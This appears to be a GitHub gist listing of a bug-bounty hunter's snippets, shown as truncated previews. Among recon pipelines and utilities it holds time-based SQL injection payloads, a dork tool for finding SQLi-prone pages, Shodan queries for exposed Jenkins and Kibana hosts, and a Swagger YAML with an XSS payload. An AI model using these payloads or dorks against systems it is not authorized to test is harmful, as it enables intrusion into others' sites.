View xss.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| uro -i waymore.txt -o uro | |
| sleep 1 | |
| /root/urldedupe/urldedupe -u uro -s -qs | tee dup | |
| sleep 1 | |
| httpx -l dup -nc -sc -ct -o duph | |
| sleep 5 |
marz-hunter
/ xss.py
Created
October 14, 2023 01:05
View xss.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from burp import IBurpExtender | |
| from burp import IHttpListener | |
| from burp import IProxyListener | |
| from burp import IExtensionHelpers | |
| from burp import IScannerListener | |
| from burp import IExtensionStateListener | |
| from burp import IParameter | |
| from java.io import PrintWriter | |
| from java.net import URLEncoder | |
| from burp import ITab |
marz-hunter
/ download site
Created
June 1, 2023 23:11
View download site
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget --mirror --convert-links --adjust-extension --page-requisites --no-parent |
marz-hunter
/ ocr
Created
May 21, 2023 21:56
View ocr
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://www.editpad.org/tool/extract-text-from-image |
marz-hunter
/ JSON to urlencoded.py
Created
January 2, 2023 02:32
View JSON to urlencoded.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import json | |
| from urllib.parse import quote, quote_plus | |
| import sys | |
| import os | |
| import argparse | |
| parser = argparse.ArgumentParser( |
marz-hunter
/ tsql
Created
December 10, 2022 00:04
View tsql
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| AND sleep(20)# | |
| '%2b(select*from(select(sleep(20)))a)%2b' | |
| 0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z |
marz-hunter
/ dorks.py
Created
November 5, 2022 00:32
— forked from mvmthecreator/dorks.py
Search Bing and Google for Dorks
View dorks.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| ***** Auto-finder by dorks tool with Google API & Bing API ***** | |
| @author: z0rtecx | |
| @release date: dec-2014 | |
| @version: 1.0.12122014 | |
| @poc: good dork for find web pages whit SQLi vulnerability in ID parameter, e.g. "inurl:details.php?id=" | |
| @description: This tool is for save time for you. It is gathering dorks of a txt file, and search potential web pages with SQLi vulnerability. ONLY FOR MySQL errors. | |
| @features: |
marz-hunter
/ shodanRecon
Created
July 21, 2022 04:43
— forked from ShubhamPy/shodanRecon
View shodanRecon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| org: org_name | |
| kibana content-length:217 | |
| org:”Amazon” ssl:”target” | |
| ssl:”target” | |
| html:”Dashboard Jenkins” http.component:”jenkins” | |
| http.title:”302 Found” | |
| http.component%3A”java” | |
| https://www.shodan.io/host/ip#9200 | |
| https://www.shodan.io/host/ip | |
| X-Redirect-By: WordPress ssl:”name” |
marz-hunter
/ sslChainDeetz.py
Created
July 21, 2022 04:41
— forked from n0x08/sslChainDeetz.py
Shodan SSL Chain cert details
View sslChainDeetz.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # !/usr/bin/env python | |
| # sslChainDeetz.py | |
| # | |
| # Dependencies: | |
| # - shodan | |
| # - pyOpenSSL | |
| # | |
| # Installation: | |
| # sudo easy_install shodan | |
| # |
marz-hunter
/ test.yaml
Last active
May 17, 2022 01:46
View test.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: XSS yaml.spec | |
| description: | | |
| <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(document.domain)'>"> | |
| paths: | |
| /accounts: | |
| get: | |
| responses: | |
| '200': |
NewerOlder